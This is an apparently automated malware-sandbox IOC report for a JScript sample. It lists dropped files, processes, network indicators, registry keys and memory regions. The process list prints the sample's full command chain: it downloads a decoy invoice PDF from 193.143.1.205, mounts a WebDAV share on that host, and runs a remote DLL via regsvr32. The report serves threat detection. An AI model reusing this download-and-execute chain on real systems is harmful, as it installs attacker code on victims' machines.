IOC Report
27328249893052310101.js

loading gif

Files

File Path
Type
Category
Malicious
27328249893052310101.js
ASCII text, with very long lines (37093), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\invoice.pdf
PDF document, version 1.7
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x71772b00, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\fcf3c1a8-c6f6-4eda-b755-2c2c4166db6f.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7684
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.7684
PostScript document text
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSI5b5d7.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4vvfq4na.1tb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4zqq3dud.eqx.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-16 03-17-04-617.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\3bdc3946-a70f-4c4f-be6f-557d8ff99268.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\95eec831-c837-4d44-b2b8-cc8fbc0779c9.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\e60047b2-b6a6-48ba-afbf-01767a14c2be.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\f55f80ba-8401-4029-b3f2-6a64ebc54630.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 30 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\27328249893052310101.js"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\17831253157594.dll
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
malicious
C:\Windows\System32\cmd.exe
cmd /c net use \\193.143.1.205@8888\davwwwroot\
malicious
C:\Windows\System32\net.exe
net use \\193.143.1.205@8888\davwwwroot\
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1632,i,4704499646644094334,4201205311762563793,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8

URLs

Name
IP
Malicious
http://193.143.1.205:8888/Ya
unknown
malicious
http://193.143.1.205:8888/log5
unknown
malicious
http://193.143.1.205/invoice.php
193.143.1.205
https://g.live.com/odclientsettings/Prod/C:
unknown
http://crl.ver)
unknown
http://x1.i.lencr.org/
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://193.143.1.205:8888/
unknown

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
e8652.dscx.akamaiedge.net
23.209.209.135
x1.i.lencr.org
unknown

IPs

IP
Domain
Country
Malicious
193.143.1.205
unknown
unknown
malicious
23.209.209.135
e8652.dscx.akamaiedge.net
United States
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
JScriptSetScriptStateStarted
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
19B4D412000
heap
page read and write
19B4D330000
heap
page read and write
19B4D4BA000
heap
page read and write
1C54A620000
remote allocation
page read and write
1C54A4CA000
heap
page read and write
1C54A360000
trusted library allocation
page read and write
1C54A4FD000
heap
page read and write
927D57E000
stack
page read and write
266C6635000
heap
page read and write
E69AF7C000
stack
page read and write
1C545702000
heap
page read and write
19B4D4E6000
heap
page read and write
19B4F197000
heap
page read and write
19B4D4BA000
heap
page read and write
1C545D80000
trusted library allocation
page read and write
927D0FE000
unkown
page readonly
19B4F16C000
heap
page read and write
19B4F16D000
heap
page read and write
927D37E000
stack
page read and write
1C544E94000
heap
page read and write
19B4F1D3000
heap
page read and write
19B4F1D6000
heap
page read and write
927DBFB000
stack
page read and write
19B4F1B6000
heap
page read and write
19B4F16F000
heap
page read and write
1C544DA0000
heap
page read and write
19B4F1B6000
heap
page read and write
19B4D4A6000
heap
page read and write
19B4EE10000
heap
page read and write
1C544EFF000
heap
page read and write
19B4D39A000
heap
page read and write
927DAFE000
unkown
page readonly
1C544E7C000
heap
page read and write
1C54A3D0000
trusted library allocation
page read and write
266C63D3000
heap
page read and write
19B4D48E000
heap
page read and write
56E4CFE000
stack
page read and write
19B4F1A7000
heap
page read and write
266C6378000
heap
page read and write
1C54B000000
heap
page read and write
1C546200000
trusted library allocation
page read and write
19B4F16E000
heap
page read and write
19B4F1B6000
heap
page read and write
1C54A3C0000
trusted library allocation
page read and write
19B4F1DE000
heap
page read and write
19B4F199000
heap
page read and write
19B4F16E000
heap
page read and write
1C544CC0000
heap
page read and write
266C63CD000
heap
page read and write
266C6370000
heap
page read and write
19B4F17B000
heap
page read and write
1C54A44F000
heap
page read and write
1C545E70000
trusted library section
page readonly
927D17E000
stack
page read and write
19B4F163000
heap
page read and write
19B4F1EC000
heap
page read and write
1C544F13000
heap
page read and write
1C5455F0000
trusted library allocation
page read and write
1C545615000
heap
page read and write
927C9FE000
unkown
page readonly
19B4F197000
heap
page read and write
1C54A3E0000
trusted library allocation
page read and write
19B4F1B6000
heap
page read and write
1C54A4F7000
heap
page read and write
19B4F16F000
heap
page read and write
1C54A280000
trusted library allocation
page read and write
19B4F1A7000
heap
page read and write
19B4F1EC000
heap
page read and write
1C54A270000
trusted library allocation
page read and write
1C54A260000
trusted library allocation
page read and write
E69AEFF000
stack
page read and write
19B4F1D2000
heap
page read and write
19B4F16B000
heap
page read and write
927D27E000
stack
page read and write
19B4F1EC000
heap
page read and write
56E51FE000
stack
page read and write
19B4D442000
heap
page read and write
1C5455C1000
trusted library allocation
page read and write
1C544E5C000
heap
page read and write
19B4F167000
heap
page read and write
19B4F1D5000
heap
page read and write
19B4D408000
heap
page read and write
1C54A4EB000
heap
page read and write
19B4F1B6000
heap
page read and write
1C545600000
heap
page read and write
19B4F187000
heap
page read and write
1C544E8D000
heap
page read and write
19B4F1A7000
heap
page read and write
1C544DD0000
trusted library allocation
page read and write
1C544E8F000
heap
page read and write
19B4F197000
heap
page read and write
1C54A490000
heap
page read and write
19B4F1B6000
heap
page read and write
56E50FF000
stack
page read and write
19B4F163000
heap
page read and write
927D1FE000
unkown
page readonly
19B4F16B000
heap
page read and write
1C54A620000
remote allocation
page read and write
1C54A2F0000
trusted library allocation
page read and write
266C6290000
heap
page read and write
1C54A455000
heap
page read and write
19B4F172000
heap
page read and write
266C63AB000
heap
page read and write
266C62E0000
remote allocation
page read and write
19B4F169000
heap
page read and write
19B4D49E000
heap
page read and write
1C54A442000
heap
page read and write
19B4F16B000
heap
page read and write
19B4F190000
heap
page read and write
19B4F1B0000
heap
page read and write
56E4BFE000
stack
page read and write
19B4D39E000
heap
page read and write
19B4F197000
heap
page read and write
56E4FFE000
stack
page read and write
1C544E13000
heap
page read and write
19B4F16C000
heap
page read and write
1C545E60000
trusted library section
page readonly
56E54FB000
stack
page read and write
19B4F177000
heap
page read and write
1C545713000
heap
page read and write
19B4F1B6000
heap
page read and write
1C54A2B0000
trusted library allocation
page read and write
19B4F1AF000
heap
page read and write
19B4D49D000
heap
page read and write
19B4F1B6000
heap
page read and write
19B4F199000
heap
page read and write
19B4F1A7000
heap
page read and write
E69AB8A000
stack
page read and write
1C54A400000
heap
page read and write
1C54A3D0000
trusted library allocation
page read and write
927CAFC000
stack
page read and write
1C544F02000
heap
page read and write
1C54A2C4000
trusted library allocation
page read and write
1C544E72000
heap
page read and write
927CEFB000
stack
page read and write
1C54A2F3000
trusted library allocation
page read and write
19B4F1EC000
heap
page read and write
927C27C000
stack
page read and write
19B4F173000
heap
page read and write
19B4D430000
heap
page read and write
266C62E0000
remote allocation
page read and write
927E27E000
stack
page read and write
19B4D399000
heap
page read and write
266C63AB000
heap
page read and write
1C54A50C000
heap
page read and write
1C54A420000
heap
page read and write
19B4F184000
heap
page read and write
1C54A462000
heap
page read and write
19B4F17A000
heap
page read and write
927DCFE000
unkown
page readonly
19B4F1B6000
heap
page read and write
19B4F1B6000
heap
page read and write
1C545602000
heap
page read and write
1C54A280000
trusted library allocation
page read and write
19B4F177000
heap
page read and write
1C54A200000
trusted library allocation
page read and write
927D87E000
stack
page read and write
19B4F1B6000
heap
page read and write
1C54A350000
trusted library allocation
page read and write
1C545E90000
trusted library section
page readonly
19B4F199000
heap
page read and write
1C54A45B000
heap
page read and write
927CBFE000
unkown
page readonly
1C54A281000
trusted library allocation
page read and write
1C54A2B0000
trusted library allocation
page read and write
927D5FE000
unkown
page readonly
19B4F16C000
heap
page read and write
19B4F199000
heap
page read and write
19B4F1D5000
heap
page read and write
19B4F170000
heap
page read and write
927CCFB000
stack
page read and write
19B4F1DB000
heap
page read and write
19B4D39D000
heap
page read and write
56E52FD000
stack
page read and write
1C54A2A0000
trusted library allocation
page read and write
927D6F9000
stack
page read and write
1C54A505000
heap
page read and write
19B4F162000
heap
page read and write
56E4758000
stack
page read and write
1C54A3B0000
trusted library allocation
page read and write
19B4F1EC000
heap
page read and write
266C6270000
heap
page read and write
19B4F1D5000
heap
page read and write
19B4F19F000
heap
page read and write
19B4F1AF000
heap
page read and write
19B4D42C000
heap
page read and write
19B4D395000
heap
page read and write
19B4F1B6000
heap
page read and write
19B4D350000
heap
page read and write
19B4F1A7000
heap
page read and write
19B4F1D5000
heap
page read and write
1C544EA1000
heap
page read and write
19B4F1D5000
heap
page read and write
19B4F161000
heap
page read and write
1C544DE0000
trusted library section
page read and write
1C54A50A000
heap
page read and write
927C6FE000
unkown
page readonly
1C544F29000
heap
page read and write
927D4FE000
unkown
page readonly
19B4F16C000
heap
page read and write
19B4D42B000
heap
page read and write
1C54A42D000
heap
page read and write
266C63A3000
heap
page read and write
19B4F163000
heap
page read and write
266C63A5000
heap
page read and write
1C54A502000
heap
page read and write
1C54A2C0000
trusted library allocation
page read and write
927D3FE000
unkown
page readonly
927D9FC000
stack
page read and write
1C54A45F000
heap
page read and write
1C544E9F000
heap
page read and write
1C54A350000
trusted library allocation
page read and write
1C544E00000
heap
page read and write
19B4F175000
heap
page read and write
1C545891000
trusted library allocation
page read and write
1C54A4EF000
heap
page read and write
1C54571A000
heap
page read and write
19B4D250000
heap
page read and write
927D8FE000
unkown
page readonly
266C639C000
heap
page read and write
1C544E2B000
heap
page read and write
19B4F1DB000
heap
page read and write
19B4F1DE000
heap
page read and write
1C54A48E000
heap
page read and write
266C62E0000
remote allocation
page read and write
19B4D4A4000
heap
page read and write
19B4F1B6000
heap
page read and write
19B4F1B6000
heap
page read and write
1C545B40000
trusted library allocation
page read and write
1C54A4C0000
heap
page read and write
927D2FE000
unkown
page readonly
19B4F1A8000
heap
page read and write
19B4F17F000
heap
page read and write
1C545700000
heap
page read and write
1C544EBD000
heap
page read and write
927C8FE000
stack
page read and write
19B4D4BA000
heap
page read and write
19B4D390000
heap
page read and write
56E4EFE000
stack
page read and write
19B4D48E000
heap
page read and write
E69AE7F000
stack
page read and write
1C544E41000
heap
page read and write
927C5F7000
stack
page read and write
19B4F174000
heap
page read and write
19B4D42F000
heap
page read and write
19B4F173000
heap
page read and write
19B4F16F000
heap
page read and write
1C545E80000
trusted library section
page readonly
927CDFE000
unkown
page readonly
19B4D45F000
heap
page read and write
19B4F160000
heap
page read and write
927D7FE000
unkown
page readonly
1C54A620000
remote allocation
page read and write
19B4D48E000
heap
page read and write
19B4D453000
heap
page read and write
1C544CA0000
heap
page read and write
1C545EA0000
trusted library section
page readonly
1C54571A000
heap
page read and write
19B4F1DE000
heap
page read and write
266C6630000
heap
page read and write
1C54A2C0000
trusted library allocation
page read and write
927CFFE000
unkown
page readonly
266C63C7000
heap
page read and write
927D47E000
stack
page read and write
19B4F1B6000
heap
page read and write
19B4F16F000
heap
page read and write
19B4D400000
heap
page read and write
19B4F168000
heap
page read and write
19B4D470000
heap
page read and write
19B4F18F000
heap
page read and write
1C545EB0000
trusted library section
page readonly
E69AFFE000
stack
page read and write
19B4F1AF000
heap
page read and write
19B4D48E000
heap
page read and write
1C544E77000
heap
page read and write
927E2FE000
unkown
page readonly
19B4F1DE000
heap
page read and write
1C54A50F000
heap
page read and write
19B4F1B6000
heap
page read and write
19B4F171000
heap
page read and write
19B4F1B6000
heap
page read and write
266C6190000
heap
page read and write
1C54A500000
heap
page read and write
19B4F188000
heap
page read and write
927D07E000
stack
page read and write
19B4F1B2000
heap
page read and write
266C63E0000
heap
page read and write
56E4AFF000
stack
page read and write
There are 278 hidden memdumps, click here to show them.